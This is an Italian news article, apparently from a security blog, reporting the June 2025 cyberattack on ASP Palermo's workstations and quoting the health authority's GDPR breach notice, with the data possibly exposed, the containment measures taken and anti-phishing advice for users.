PALERMO, 19 GIUGNO 2025 – Dopo le difficoltà operative registrate negli ultimi giorni, l’Azienda Sanitaria Provinciale di Palermo ha confermato ufficialmente di essere stata colpita da un attacco informatico. Il comunicato, pubblicato sul sito istituzionale dell’ente, chiarisce che l’incidente si è verificato il 18 giugno 2025 e ha coinvolto circa 45 postazioni di lavoro aziendali.

Secondo quanto dichiarato, non è ancora possibile individuare con certezza tutte le strutture aziendali collegate alle postazioni compromesse.
Descrizione
L'Azienda Sanitaria Provinciale di Palermo informa i propri utenti che in data 18 giugno 2025 ha subito un attacco informatico che ha interessato circa 45 postazioni di lavoro aziendali; non è ancora possibile individuare con certezza tutte le strutture aziendali collegate alle postazioni di lavoro eventualmente compromesse.

TIPOLOGIE DI DATI POTENZIALMENTE COINVOLTI:

Dati Anagrafici e Identificativi
Dati di contatto
Dati relativi a pratiche amministrative
Altri Dati in fase di individuazione
L'identificazione puntuale dei soggetti coinvolti non è al momento integralmente possibile.

La presente comunicazione ha quindi valore di misura alternativa di notifica, ai sensi dell'Art. 34, paragrafo 3, Lettera C) del GDPR.

MISURE ADOTTATE DALL' AZIENDA:

Immediato isolamento delle postazioni compromesse;
Attivazione delle procedure interne di sicurezza e analisi forense;
Notifica dell'incidente al Garante per la Protezione dei Dati Personali, come previsto dall'Articolo 33 del GDPR;
Collaborazione con le Autorità competenti per le indagini in corso;
RACCOMANDAZIONI AGLI UTENTI POTENZIALMENTE INTERESSATI:

Non rispondere a messaggi sospetti;
Verificare attentamente l'indirizzo e-mail del mittente e l'oggetto del messaggio;
Si consiglia, inoltre, di monitorare attentamente i propri account e di segnalare eventuali attività sospette;
Prestare particolare attenzione a comunicazioni inattese che richiedono informazioni personali, specialmente via e-mail o telefono;
In caso di dubbi o sospetti, contattare direttamente l'ASP di Palermo.
Per ulteriori informazioni o chiarimenti, è possibile contattare l'ASP di Palermo ai seguenti recapiti:

Responsabile della Protezione dei Dati (RPD)
E-mail: rpd@asppalermo.org
L'Azienda Sanitaria Provinciale di Palermo si scusa per l'accaduto e assicura la massima trasparenza, adottando tutte le misure necessarie per la tutela dei dati personali.

Ultimo aggiornamento: 20/06/2025, 14:51

Tipologie di dati potenzialmente coinvolti

L’ASP di Palermo ha specificato che i dati che potrebbero essere stati esfiltrati includono:

• Dati anagrafici e identificativi
• Dati di contatto
• Dati relativi a pratiche amministrative
• Altri dati in fase di individuazione

Al momento, non è possibile identificare puntualmente i soggetti coinvolti, motivo per cui – in conformità all’Art. 34, par. 3, lett. C del GDPR – la comunicazione pubblica assume valore di notifica alternativa.

Misure adottate dall’ASP

Per contenere l’attacco e prevenirne l’ulteriore diffusione, l’Azienda ha avviato una serie di misure immediate:

• Isolamento delle postazioni compromesse
• Attivazione delle procedure di sicurezza informatica e analisi forense
• Notifica dell’incidente al Garante per la Protezione dei Dati Personali (Art. 33 del GDPR)
• Collaborazione con le autorità competenti per le indagini in corso

Raccomandazioni agli utenti potenzialmente coinvolti

L’ASP di Palermo invita l’utenza a mantenere la massima prudenza, fornendo alcune precauzioni fondamentali:

• Non rispondere a messaggi sospetti
• Verificare l’indirizzo e-mail e l’oggetto di eventuali comunicazioni
• Monitorare i propri account e segnalare eventuali attività anomale
• Prestare attenzione a richieste di dati personali via email o telefono
• In caso di dubbi, contattare direttamente l’ASP

Per chiarimenti o ulteriori informazioni, è possibile contattare il Responsabile della Protezione dei Dati (RPD) dell’Azienda all’indirizzo e-mail: rpd@asppalermo.org.

L’ASP di Palermo si scusa per l’accaduto e assicura la massima trasparenza, ribadendo il proprio impegno nel garantire la sicurezza e la tutela dei dati personali degli utenti.

L'articolo Attacco informatico alla ASP Palermo. Dopo i disservizi, il comunicato dell’organizzazione proviene da il blog della sicurezza informatica.